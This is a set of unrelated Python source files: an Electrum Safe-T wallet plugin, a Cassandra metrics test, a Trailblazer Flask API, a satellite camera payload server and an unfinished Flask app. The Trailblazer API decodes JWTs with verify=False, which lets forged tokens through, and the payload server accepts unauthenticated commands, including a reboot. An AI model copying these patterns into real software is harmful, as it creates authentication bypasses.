client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_safet_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_safet_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx: Transaction):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if info.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
test_cassandra.py
|
# (C) Datadog, Inc. 2010-2016
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
import threading
import time
from types import ListType
import unittest
import os
import mock
# 3p
from nose.plugins.attrib import attr
# project
from aggregator import MetricsAggregator
import logging
LOG_INFO = {
'log_to_event_viewer': False,
'log_to_syslog': False,
'syslog_host': None,
'syslog_port': None,
'log_level': logging.INFO,
'disable_file_logging': True,
'collector_log_file': '/var/log/stackstate/collector.log',
'forwarder_log_file': '/var/log/stackstate/forwarder.log',
'dogstatsd_log_file': '/var/log/stackstate/dogstatsd.log',
'jmxfetch_log_file': '/var/log/stackstate/jmxfetch.log',
'go-metro_log_file': '/var/log/stackstate/go-metro.log',
}
with mock.patch('config.get_logging_config', return_value=LOG_INFO):
from stsstatsd import Server
from jmxfetch import JMXFetch
log = logging.getLogger('cassandra_test')
STATSD_PORT = 8121
class DummyReporter(threading.Thread):
def __init__(self, metrics_aggregator):
threading.Thread.__init__(self)
self.finished = threading.Event()
self.metrics_aggregator = metrics_aggregator
self.interval = 10
self.metrics = None
self.finished = False
self.start()
def run(self):
while not self.finished:
time.sleep(self.interval)
self.flush()
def flush(self):
metrics = self.metrics_aggregator.flush()
if metrics:
self.metrics = metrics
@attr(requires='cassandra')
class JMXTestCase(unittest.TestCase):
def setUp(self):
aggregator = MetricsAggregator("test_host")
self.server = Server(aggregator, "localhost", STATSD_PORT)
self.reporter = DummyReporter(aggregator)
self.t1 = threading.Thread(target=self.server.start)
self.t1.start()
confd_path = os.path.join(os.path.dirname(__file__), 'ci')
self.jmx_daemon = JMXFetch(confd_path, {'dogstatsd_port': STATSD_PORT})
self.t2 = threading.Thread(target=self.jmx_daemon.run)
self.t2.start()
def tearDown(self):
self.server.stop()
self.reporter.finished = True
self.jmx_daemon.terminate()
def testCustomJMXMetric(self):
count = 0
while self.reporter.metrics is None:
time.sleep(1)
count += 1
if count > 25:
raise Exception("No metrics were received in 25 seconds")
metrics = self.reporter.metrics
self.assertTrue(isinstance(metrics, ListType))
self.assertTrue(len(metrics) > 0)
log.info([t for t in metrics if "cassandra." in t['metric'] and "instance:cassandra_instance" in t['tags']])
log.info(metrics)
log.info(len([t for t in metrics if "cassandra." in t['metric'] and "instance:cassandra_instance" in t['tags']]))
log.info(len([t for t in metrics if "instance:cassandra_instance" in t['tags']]))
log.info(len([t for t in metrics if "cassandra." in t['metric']]))
log.info(len(metrics))
self.assertTrue(len([t for t in metrics if "cassandra." in t['metric'] and "instance:cassandra_instance" in t['tags']]) > 40, metrics)
|
api.py
|
import datetime
import multiprocessing
import os
from typing import Dict, Mapping
from dateutil.parser import parse as parse_datestr
from flask import Blueprint, abort, g, jsonify, make_response, request
from google.auth import jwt
from trailblazer.server.ext import store
blueprint = Blueprint("api", __name__, url_prefix="/api/v1")
def stringify_timestamps(data: dict) -> Dict[str, str]:
"""Convert datetime into string before dumping in order to avoid information loss"""
for key, val in data.items():
if isinstance(val, datetime.datetime):
data[key] = str(val)
return data
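# Illustrative example (value not from the original code):
#   {"started_at": datetime.datetime(2021, 1, 1)} -> {"started_at": "2021-01-01 00:00:00"}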
@blueprint.before_request
def before_request():
"""Authentication that is run before processing requests to the application"""
if request.method == "OPTIONS":
return make_response(jsonify(ok=True), 204)
if os.environ.get("SCOPE") == "DEVELOPMENT":
return
auth_header = request.headers.get("Authorization")
if auth_header:
jwt_token = auth_header.split("Bearer ")[-1]
else:
return abort(403, "no JWT token found on request")
user_data: Mapping = jwt.decode(jwt_token, verify=False)
user_obj = store.user(user_data["email"], include_archived=False)
if user_obj is None:
return abort(403, f"{user_data['email']} doesn't have access")
g.current_user = user_obj
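# Sketch of how a client is expected to call this API (hostname and token variable are
# illustrative placeholders, not part of this module): outside SCOPE=DEVELOPMENT every
# request must carry a Google-signed JWT in the Authorization header, e.g.
#
#   import requests
#   requests.get(
#       "https://<trailblazer-host>/api/v1/analyses",
#       headers={"Authorization": f"Bearer {jwt_token}"},
#   )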
@blueprint.route("/analyses")
def analyses():
"""Display analyses."""
per_page = int(request.args.get("per_page", 100))
page = int(request.args.get("page", 1))
query = store.analyses(
status=request.args.get("status"),
query=request.args.get("query"),
is_visible=request.args.get("is_visible") == "true" or None,
)
query_page = query.paginate(page, per_page=per_page)
data = []
for analysis_obj in query_page.items:
analysis_data = analysis_obj.to_dict()
analysis_data["user"] = analysis_obj.user.to_dict() if analysis_obj.user else None
analysis_data["failed_jobs"] = [job_obj.to_dict() for job_obj in analysis_obj.failed_jobs]
data.append(analysis_data)
return jsonify(analyses=data)
@blueprint.route("/analyses/<int:analysis_id>", methods=["GET", "PUT"])
def analysis(analysis_id):
"""Display a single analysis."""
analysis_obj = store.analysis(analysis_id)
if analysis_obj is None:
return abort(404)
if request.method == "PUT":
analysis_obj.update(request.json)
store.commit()
data = analysis_obj.to_dict()
data["failed_jobs"] = [job_obj.to_dict() for job_obj in analysis_obj.failed_jobs]
data["user"] = analysis_obj.user.to_dict() if analysis_obj.user else None
return jsonify(**data)
@blueprint.route("/info")
def info():
"""Display meta data about database."""
metadata_obj = store.info()
return jsonify(**metadata_obj.to_dict())
@blueprint.route("/me")
def me():
"""Return information about a logged in user."""
return jsonify(**g.current_user.to_dict())
@blueprint.route("/aggregate/jobs")
def aggregate_jobs():
"""Return stats about jobs."""
days_back = int(request.args.get("days_back", 31))
one_month_ago = datetime.datetime.now() - datetime.timedelta(days=days_back)
data = store.aggregate_failed(one_month_ago)
return jsonify(jobs=data)
@blueprint.route("/update-all")
def update_analyses():
"""Update all ongoing analysis by querying SLURM"""
process = multiprocessing.Process(target=store.update_ongoing_analyses, kwargs={"ssh": True})
process.start()
return jsonify(f"Success! Trailblazer updated {datetime.datetime.now()}"), 201
@blueprint.route("/update/<int:analysis_id>", methods=["PUT"])
def update_analysis(analysis_id):
"""Update a specific analysis"""
try:
process = multiprocessing.Process(
target=store.update_run_status, kwargs={"analysis_id": analysis_id, "ssh": True}
)
process.start()
return jsonify("Success! Update request sent"), 201
except Exception as e:
return jsonify(f"Exception: {e}"), 409
@blueprint.route("/cancel/<int:analysis_id>", methods=["PUT"])
def cancel(analysis_id):
"""Cancel an analysis and all slurm jobs associated with it"""
auth_header = request.headers.get("Authorization")
jwt_token = auth_header.split("Bearer ")[-1]
user_data = jwt.decode(jwt_token, verify=False)
try:
process = multiprocessing.Process(
target=store.cancel_analysis,
kwargs={"analysis_id": analysis_id, "email": user_data["email"], "ssh": True},
)
process.start()
return jsonify("Success! Cancel request sent"), 201
except Exception as e:
return jsonify(f"Exception: {e}"), 409
@blueprint.route("/delete/<int:analysis_id>", methods=["PUT"])
def delete(analysis_id):
"""Cancel an analysis and all slurm jobs associated with it"""
try:
process = multiprocessing.Process(
target=store.delete_analysis,
kwargs={"analysis_id": analysis_id, "force": True},
)
process.start()
return jsonify("Success! Delete request sent!"), 201
except Exception as e:
return jsonify(f"Exception: {e}"), 409
# CG REST INTERFACE ###
# ONLY POST routes which accept messages in specific format
# NOT for use with GUI (for now)
@blueprint.route("/query-analyses", methods=["POST"])
def post_query_analyses():
"""Return list of analyses matching the query terms"""
content = request.json
query_analyses = store.analyses(
case_id=content.get("case_id"),
query=content.get("query"),
status=content.get("status"),
deleted=content.get("deleted"),
temp=content.get("temp"),
before=parse_datestr(content.get("before")) if content.get("before") else None,
is_visible=content.get("visible"),
family=content.get("family"),
data_analysis=content.get("data_analysis"),
)
data = [stringify_timestamps(analysis_obj.to_dict()) for analysis_obj in query_analyses]
return jsonify(*data), 200
@blueprint.route("/get-latest-analysis", methods=["POST"])
def post_get_latest_analysis():
"""Return latest analysis entry for specified case"""
content = request.json
analysis_obj = store.get_latest_analysis(case_id=content.get("case_id"))
if analysis_obj:
data = stringify_timestamps(analysis_obj.to_dict())
return jsonify(**data), 200
return jsonify(None), 200
@blueprint.route("/find-analysis", methods=["POST"])
def post_find_analysis():
"""Find analysis using case_id, date, and status"""
content = request.json
analysis_obj = store.get_analysis(
case_id=content.get("case_id"),
started_at=parse_datestr(content.get("started_at")),
status=content.get("status"),
)
if analysis_obj:
data = stringify_timestamps(analysis_obj.to_dict())
return jsonify(**data), 200
return jsonify(None), 200
@blueprint.route("/delete-analysis", methods=["POST"])
def post_delete_analysis():
"""Delete analysis using analysis_id. If analysis is ongoing, error will be raised.
To delete ongoing analysis, --force flag should also be passed.
If an ongoing analysis is deleted in ths manner, all ongoing jobs will be cancelled"""
content = request.json
try:
store.delete_analysis(analysis_id=content.get("analysis_id"), force=content.get("force"))
return jsonify(None), 201
except Exception as e:
return jsonify(f"Exception: {e}"), 409
@blueprint.route("/mark-analyses-deleted", methods=["POST"])
def post_mark_analyses_deleted():
"""Mark all analysis belonging to a case deleted"""
content = request.json
old_analyses = store.mark_analyses_deleted(case_id=content.get("case_id"))
data = [stringify_timestamps(analysis_obj.to_dict()) for analysis_obj in old_analyses]
if data:
return jsonify(*data), 201
return jsonify(None), 201
@blueprint.route("/add-pending-analysis", methods=["POST"])
def post_add_pending_analysis():
"""Add new analysis with pending status"""
content = request.json
try:
analysis_obj = store.add_pending_analysis(
case_id=content.get("case_id"),
email=content.get("email"),
type=content.get("type"),
config_path=content.get("config_path"),
out_dir=content.get("out_dir"),
priority=content.get("priority"),
data_analysis=content.get("data_analysis"),
)
data = stringify_timestamps(analysis_obj.to_dict())
return jsonify(**data), 201
except Exception as e:
return jsonify(f"Exception: {e}"), 409
|
Server.py
|
### BAAMSAT CAMERA PAYLOAD SERVER ###
import socket
import logging
import queue
import csv
import threading
import os
from datetime import datetime
from time import sleep
from multiprocessing import Process
from gpiozero import CPUTemperature
from temperature_Sensor import Temperature_Sensor
from mosfet import Mosfet
from camera import Camera
from current_sensor import Current_sensor
from auto_mode import AutoMode
"""
Class to instantiate the Logging system of the payload
"""
class Log:
def __init__(self,filename):
logging.basicConfig(filename=filename, format='[%(levelname)s] %(asctime)s: %(message)s',level=logging.INFO)
"""
Class to instantiate the server
"""
class Server:
def __init__(self,Host,Port): # Constructor of the class, specify the Host and the Port of the connection
self.Host = Host
self.Port = Port
def get_Host(self):
return self.Host
def get_Port(self):
return self.Port
def set_Host(self,Host):
self.Host = Host
def set_Port(self,Port):
self.Port = Port
def set_temp_sensor(self,temp_sensor):
self.temp_sensor = temp_sensor
def set_mosfets(self,mosfets):
self.mosfet_list = mosfets
def set_interval_temp(self,interval):
self.interval_temp = interval
def set_interval_mosfet(self,interval):
self.interval_mosfet = interval
def set_camera(self,cam):
self.camera = cam
def set_automode(self,automode):
self.auto_mode = automode
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Socket for the TCP connection
connection = 0
process_save_temp = 0 # Process of Saving temp
in_process_save_temp = False # Bool to keep track of in process or not
in_connection = False
temp_sensor = [] # List of the temperature sensors in the payload
interval_temp = 2 # Interval between the measurement of the temperature
interval_mosfet = 2 # Interval between the update of the mosfets
mosfet_list = [] # List of the mosfets in the payload
process_auto_heat = 0 # Process of Auto Heat
in_process_auto_heat = False
camera = 0 # Save the camera object into the Server class
process_record = 0
in_process_record = False
process_currrent = 0
process_time_lapse = 0
in_process_time_lapse = False
in_save_current = False
auto_mode = 0
in_auto_mode = False
process_auto_mode = 0
auto_heat_temp_treshold = 15 # Threshold for the activation of the Mosfet and so the heating system
def __setup_connection(self): # Function to initiate the connection between the ground computer and the payload
try:
self.socket.listen(1) # Waiting for the connection
print("Waiting for connection")
logging.info("Waiting for connection")
conn, addr = self.socket.accept()
print("Connected with: {}".format(addr))
logging.info("Connected with: {}".format(addr))
return conn
except:
print("No connection found")
logging.error("No connection found")
def save_current(self,filename): # Function to save the current values inside a csv file
with open(filename,mode="a") as csv_file:
csv_file.write("{0},{1},{2},{3}\n".format("Date","Tension","Intensite","Puissance"))
while True:
current = get_curent()
csv_file.write("{0},{1},{2},{3}\n".format(str(datetime.now()),str(current[0]),str(current[1]),str(current[2])))
csv_file.flush()
sleep(2)
def establish_connection(self): # Function to establish the connection with the ground computer
try:
print("Connection on Port {} Open".format(self.Port))
logging.info("Connection on Port {} Open".format(self.Port))
self.socket.bind((self.Host,self.Port))
self.connection = self.__setup_connection()
self.in_connection = True
except:
print("Can't open connection")
logging.error("Can't open connection")
def __command_library(self,command,data): # Function containing the command dictionary
reply = ""
if command == 'REPEAT': # REPEAT command to test the connection
reply = data[1]
elif command == 'LOGOUT' or command == 'MODULE_OFF': # Logging out command
print('System logout')
reply = 'Server logging out'
elif command == 'SAVE_TEMP': # Command to launch the saving of the temperature
self.process_save_temp = Process(target=self.save_temp,args=(self.temp_sensor,"temp.csv",)) # create the process
self.in_process_save_temp = True
self.process_save_temp.start() # start the process
reply = 'Recording temperature'
elif command == 'STOP_SAVE_TEMP': # Command to stop the save of the temp
if self.in_process_save_temp:
self.process_save_temp.terminate()
self.in_process_save_temp = False
reply = 'Process stopped'
else:
print("Can't stop save temp, not in process")
logging.error("Can't stop save temp, not in process")
reply = "Can't stop save temp, not in process"
elif command == 'VIDEO_RECORDING_START': # Command to start the recording
try:
self.process_record = Process(target=self.camera.start_recording,args=(self.camera.resolution_video,self.camera.fps,))
self.in_process_record = True
self.process_record.start()
reply = 'Camera started recording'
print("Camera started recording")
logging.info("Camera started recording")
except:
print("Can't start the recording")
logging.error("Can't start the recording")
elif command == 'VIDEO_RECORDING_STOP': # Command to stop the recording
if self.in_process_record:
self.in_process_record = False
self.camera.stop_recording()
reply = 'Recording stopped'
else:
print("Can't stop recording, not in process")
logging.error("Can't stop recording, not in process")
reply = "Can't stop recording, not in process"
elif command == "SET_VIDEO_RES": # Command to change the video resolution
self.camera.set_video_res(data[1])
logging.info("Video resolution set to "+data[1])
reply = "Video resolution set to "+data[1]
elif command == "TIME_LAPSE_RECORDING_START": # Command to start the timelapse recording
try:
self.process_time_lapse = Process(target=self.camera.start_timelapse)
self.in_process_time_lapse = True
self.process_time_lapse.start()
reply = 'Time Lapse started'
print("Time Lapse started")
logging.info("Time Lapse started")
except:
print("Can't start the Time Lapse")
logging.error("Can't start the Time Laps")
elif command == 'TIME_LAPSE_RECORDING_STOP': # Command to stop the Timelapse recording
if self.in_process_time_lapse:
self.in_process_time_lapse = False
self.process_time_lapse.terminate()
reply = 'Time Lapse stopped'
else:
print("Can't stop time lapse, not in process")
logging.error("Can't stop time lapse, not in process")
reply = "Can't stop time lapse, not in process"
elif command == 'SET_TIME_LAPSE_RES': # Command to change the timelapse resolution
self.camera.set_time_lapse_resolution(data[1])
logging.info("Time Lapse resolution set to "+data[1])
reply = "Time Lapse resolution set to "+data[1]
elif command == "SET_TIME_LAPSE_IT": # Command to change the timelapse interval
self.camera.set_timelaps_delay(int(data[1]))
logging.info("Time Lapse interval set to "+data[1])
reply = "Time Lapse interval set to "+data[1]
elif command == "SET_VIDEO_FPS": # Command to change the fps of the recorded video
self.camera.set_fps(int(data[1]))
logging.info("Video FPS set to "+data[1])
reply = "Video FPS set to "+data[1]
elif command == 'SAVE_CURRENT': # Command to save the Current values
self.in_save_current = True
self.process_currrent = Process(target=self.save_current,args=("current.csv",))
self.process_currrent.start() # start the process, otherwise nothing is ever recorded
reply = 'Recording current'
elif command == 'STOP_SAVE_CURRENT': # Command to stop the save of the current
self.process_currrent.terminate()
self.in_save_current = False
reply = 'Stop Recording Current'
elif command == 'REBOOT': # Command to reboot the payload system, and so the raspberry pi
os.system("sudo reboot")
reply = 'Rebooting system'
elif command == 'GET_STATE': # Command to get the state of the payload
reply = "\nCurrent state of the system:\nSAVE TEMP: {}\nSAVE CURRENT: {}\nAUTO HEAT: {}\nIN RECORD: {}\nIN TIMELAPSE: {}".format(self.in_process_save_temp,self.in_save_current,self.in_process_auto_heat,self.in_process_record,self.in_process_time_lapse)
elif command == 'THERMAL_SET': # Command to change the temp threshold
self.auto_heat_temp_treshold = int(data[1])
print("Thermal auto heat set to "+data[1])
logging.error("Thermal auto heat set to "+data[1])
reply = "Thermal auto heat set to "+data[1]
elif command == 'SENSOR_READ': # Command to get the temperature in live
temp = self.read_temp(self.temp_sensor)
reply="\nTemperature °C:\nBattery: {}\nCamera: {}\nRaspberry: {}".format(temp[0],temp[1],temp[2])
elif command == 'DOWNLINK_IMAGE': # Command to get an image preview
data = self.camera.get_image_downlink()
print(data)
reply=data
elif command == 'AUTO_HEAT_START': # Command to start the autonomous heating system
self.process_auto_heat = threading.Thread(target = self.update_mosfets)
self.in_process_auto_heat = True
self.process_auto_heat.start()
reply = 'Auto heat ON'
elif command == 'AUTO_HEAT_STOP': # Command to stop the heating system
if self.in_process_auto_heat:
self.in_process_auto_heat = False
for mosfet in self.mosfet_list:
mosfet.set_pwm(0)
reply = 'Auto Heat stopped'
else:
print("Can't stop auto heat, not in process")
logging.error("Can't stop auto heat, not in process")
reply = "Can't stop auto heat, not in process"
elif command == 'AUTO_MODE_START':
self.in_auto_mode = True
self.process_auto_mode = Process(target=self.start_automode)
self.process_auto_mode.start()
reply = 'Auto Mode On'
elif command == 'AUTO_MODE_STOP':
self.in_auto_mode = False
reply = 'Auto Mode Off'
elif command == 'GET_AUTO_MODE_LIST':
reply = self.auto_mode.print_command_list()
elif command == 'ADD_COMMAND':
com = data[1].split(' ',1)
print(com)
if len(com) == 2:
self.auto_mode.add_command(com[0],com[1])
else:
self.auto_mode.add_command(com[0])
reply = "command added"
elif command == 'DELETE_COMMAND':
self.auto_mode.delete_command(int(data[1]))
reply = "command deleted"
elif command == 'SAVE_COMMAND_HISTORY':
self.auto_mode.save_command_history()
reply='History saved'
else:
reply = 'No command found'
return reply
def start_automode(self):
self.auto_mode.print_command_list()
com,length = self.auto_mode.read_command()
while com != None and self.in_auto_mode == True:
self.__command_library(com,com)
if length == None:
pass
else:
sleep(int(length))
self.auto_mode.print_command_list()
com,length = self.auto_mode.read_command()
def establish_communication(self): # Function that allows the communication between the ground and the payload
if self.in_connection:
print("Communication establish")
logging.info("Communication establish")
while True:
data = self.connection.recv(1024)
if not data == '':
data = data.decode('utf-8')
print('Data Received: {}'.format(data))
logging.info('Data Received: {}'.format(data))
data = data.split(' ',1)
command = data[0]
reply = self.__command_library(command,data)
if command == 'LOGOUT':
break
try:
self.connection.sendall(reply.encode('utf-8'))
except:
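# Fallback path: the reply may already be bytes (e.g. the image downlink data), in
# which case .encode() fails; send the payload length first, then the raw bytes.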
print(len(reply))
print(len(reply.ljust(1024)))
length = str(len(reply))
self.connection.sendall(length.encode('utf-8'))
self.connection.sendall(reply)
print('Reply sent')
logging.info('Reply sent')
else:
print("No Connection, Can't establish the communications")
logging.error("No Connection, Can't establish the communications")
def save_temp(self,sensor_list,filename): # Function to save the temp
with open(filename,mode="a") as csv_file:
csv_file.write("{0},{1},{2},{3},{4}\n".format("Date","Battery","Camera","Raspberry","CPU"))
while True:
temp = []
for sensor in sensor_list:
temp.append(sensor.get_temp())
csv_file.write("{0},{1},{2},{3},{4}\n".format(str(datetime.now()),str(temp[0]),str(temp[1]),str(temp[2]),str(self.get_temp_cpu())))
logging.info("{0},{1},{2},{3},{4}\n".format(str(datetime.now()),str(temp[0]),str(temp[1]),str(temp[2]),str(self.get_temp_cpu())))
csv_file.flush()
sleep(self.interval_temp)
def read_temp(self,sensor_list): # function to answer the command Get temp
temp = []
for sensor in sensor_list:
temp.append(sensor.get_temp())
return temp
def get_DutyCycle(self,temp): # Function to calculate the Duty Cycle of the PWM of a mosfet according to the temp
offset = 0
temp = temp - offset
upper_bound = self.auto_heat_temp_treshold
lower_bound = 0
diff = upper_bound - lower_bound
pwm = -(temp/diff)*100 + 100
print(pwm)
if pwm > 100:
pwm = 100
if pwm < 0:
pwm= 0
if temp < 0:
pwm = 100
if pwm != 0:
logging.info("PWM actif dutycyle: {}".format(pwm))
return pwm
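# Worked example of the linear mapping above (with the default threshold of 15):
# temp >= 15 C -> 0 % duty cycle, temp = 7.5 C -> 50 %, temp <= 0 C -> 100 %.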
def update_mosfets(self): # Function to update the duty cycle of each mosfet
while self.in_process_auto_heat:
for k in range(len(self.mosfet_list)):
temp = self.temp_sensor[k].get_temp()
pwm = self.get_DutyCycle(temp)
self.mosfet_list[k].set_pwm(pwm)
sleep(self.interval_mosfet)
def get_temp_cpu(self): # Get the temp of the Raspberry Pi CPU
cpu = CPUTemperature()
return cpu.temperature
def get_nb_photos():
nb_photo = 1
fileName = "./images/timelaps_"+str(nb_photo)+".jpeg"
while os.path.exists(fileName):
nb_photo += 1
fileName = "./images/timelaps_"+str(nb_photo)+".jpeg"
return nb_photo
def __main__(): # Main function of the Server
nb_phot = get_nb_photos()
log = Log("log_test.txt") # initiate the logging system
server = Server('',5005) # Initiate the Server Object
temp_raspberry= Temperature_Sensor(0x1A) # Declaration of the Temperature Sensors
temp_camera = Temperature_Sensor(0x19)
temp_battery = Temperature_Sensor(0x18)
server.set_temp_sensor([temp_battery,temp_camera,temp_raspberry])
mosfet_camera = Mosfet(23) # Declaration of the Mosfets
mosfet_battery = Mosfet(24)
server.set_mosfets([mosfet_battery,mosfet_camera])
cam = Camera("mjpeg") # Declaration of the camera
cam.set_nb_photos(nb_phot)
auto_mode = AutoMode("command_AutoMode.pkl")
server.set_automode(auto_mode)
server.set_camera(cam)
server.establish_connection() # Start the communication
server.establish_communication()
__main__()
|
imackager.py
|
#!/usr/bin/env python3
import subprocess
from xml.dom import minidom
from xml.dom.minidom import Node
import os
import shutil
import xml.etree.ElementTree as ET
import urllib.request
from flask import Flask, request, jsonify, send_from_directory
from urllib.parse import urlparse
import urllib.parse
import os.path
import random
import string
import json
from pprint import pprint
from shutil import copyfile
from threading import Thread
from itertools import groupby
app = Flask(__name__)
class InvalidUsage(Exception):
status_code = 400
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
@app.route('/dash/<path:path>')
def send_js(path):
return send_from_directory('dash', path)
@app.errorhandler(InvalidUsage)
def handle_invalid_usage(error):
response = jsonify(error.to_dict())
response.status_code = error.status_code
return response
@app.route("/")
def home():
return "Imackager is running fine"
def escape(u):
p = urlparse(u)
